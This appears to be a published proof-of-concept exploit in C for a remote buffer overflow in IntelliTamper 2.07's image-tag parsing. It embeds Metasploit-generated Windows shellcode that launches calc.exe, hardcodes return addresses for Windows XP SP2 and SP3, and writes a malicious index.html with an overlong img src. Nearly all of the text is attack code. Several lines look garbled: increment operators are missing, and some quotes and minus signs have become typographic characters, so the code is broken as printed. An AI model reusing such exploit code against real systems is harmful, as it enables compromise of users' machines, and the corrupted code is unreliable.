IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit

/*

* IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Expoit

*

* Discovered & Written by r0ut3r (writ3r [at] gmail.com)

* Many Thanks to Luigi Auriemma (http://aluigi.org)

*

* Greets to shinnai (http://www.shinnai.net)

* and Guido Landi

*

* IntelliTamper contains a remote buffer overflow vulnerability.

* The HTML parser, more precise the image tag fails to preform

* boundary checks on supplied data.

*

* kit:/home/r0ut3r/public_html/imgsrc-xpl # gcc -o yahh yahh.c

* kit:/home/r0ut3r/public_html/imgsrc-xpl # ./yahh 0

* [!] OS: Microsoft Windows XP Pro SP 2

* [ ] Building payload

* [ ] Inserting JMP code

* [ ] Success writing to index.html

* kit:/home/r0ut3r/public_html/imgsrc-xpl #

*/

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

/* win32_exec – EXITFUNC=thread CMD=c:\\windows\\system32\\calc.exe Size=184

Encoder=PexFnstenvSub http://metasploit.com

Filtered characters: 0x00 0x22 0x09 0x0a 0x0d 0x3c 0x3e */

unsigned char shellcode[] =

"\\x31\\xc9\\x83\\xe9\\xd8\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x99"

"\\xeb\\x8d\\x6a\\x83\\xeb\\xfc\\xe2\\xf4\\x65\\x03\\xc9\\x6a\\x99\\xeb\\x06\\x2f"

"\\xa5\\x60\\xf1\\x6f\\xe1\\xea\\x62\\xe1\\xd6\\xf3\\x06\\x35\\xb9\\xea\\x66\\x23"

"\\x12\\xdf\\x06\\x6b\\x77\\xda\\x4d\\xf3\\x35\\x6f\\x4d\\x1e\\x9e\\x2a\\x47\\x67"

"\\x98\\x29\\x66\\x9e\\xa2\\xbf\\xa9\\x6e\\xec\\x0e\\x06\\x35\\xbd\\xea\\x66\\x0c"

"\\x12\\xe7\\xc6\\xe1\\xc6\\xf7\\x8c\\x81\\x12\\xf7\\x06\\x6b\\x72\\x62\\xd1\\x4e"

"\\x9d\\x28\\xbc\\xaa\\xfd\\x60\\xcd\\x5a\\x1c\\x2b\\xf5\\x66\\x12\\xab\\x81\\xe1"

"\\xe9\\xf7\\x20\\xe1\\xf1\\xe3\\x66\\x63\\x12\\x6b\\x3d\\x6a\\x99\\xeb\\x06\\x02"

"\\xa5\\xb4\\xbc\\x9c\\xf9\\xbd\\x04\\x92\\x1a\\x2b\\xf6\\x3a\\xf1\\x04\\x43\\x8a"

"\\xf9\\x83\\x15\\x94\\x13\\xe5\\xda\\x95\\x7e\\x88\\xb7\\x36\\xee\\x82\\xe3\\x0e"

"\\xf6\\x9c\\xfe\\x36\\xea\\x92\\xfe\\x1e\\xfc\\x86\\xbe\\x58\\xc5\\x88\\xec\\x06"

"\\xfa\\xc5\\xe8\\x12\\xfc\\xeb\\x8d\\x6a";

#define JMP 0xe9 //JMP

int main(int argc, char* argv[])

{

FILE *fd;

unsigned char buff[4000],

*jmpref,

*p;

int opt;

struct

{

char *os;

unsigned int eip;

} targets[] =

{

"Microsoft Windows XP Pro SP 2",

0x7d040e1f,

"Microsoft Windows XP Pro SP 3",

0x7c8369f0

};

if (argc < 2)

{

printf("———————————————————\\n");

printf(" IntelliTamper 2.07 Remote Buffer Overflow Expoit \\n\\n");

printf(" Discovered & Written by r0ut3r (writ3r [at] gmail.com)\\n");

printf(" Thanks to Luigi Auriemma (http://aluigi.org)\\n\\n");

printf(" Usage: %s <OS-type>\\n", argv[0]);

printf(" 0: Microsoft Windows XP Pro SP2\\n");

printf(" 1: Microsoft Windows XP Pro SP3\\n");

printf("———————————————————\\n");

return 1;

}

p = buff;

switch (atoi(argv[1]))

{

case 0:

opt = 0;

printf("[!] OS: %s\\n", targets[0].os);

break;

case 1:

opt = 1;

printf("[!] OS: %s\\n", targets[1].os);

break;

}

printf("[ ] Building payload\\n");

p = sprintf(p, "<img src=\\"http://");

jmpref = p;

p = sprintf(p, "%s", shellcode);

int i;

int a = 3065 – (p – jmpref);

for (i=0; i < a; i )

*p = \’A\’;

*(unsigned int *) p = targets[opt].eip;

p = 4;

printf("[ ] Inserting JMP code\\n");

*p = JMP;

*(unsigned int *) p = jmpref – (p 4); //JMP -(3065 4 5)

p = 4;

p = sprintf(p, "\\">");

fd = fopen("index.html", "wb");

if (fd == NULL)

{

perror("[-] Failed opening index.html\\n");

return 1;

}

fwrite(buff, 1, p – buff, fd);

if (fclose(fd) == 0)

printf("[ ] Success writing to index.html\\n");

else

printf("[-] Failed writing to index.html\\n");

return 0;

}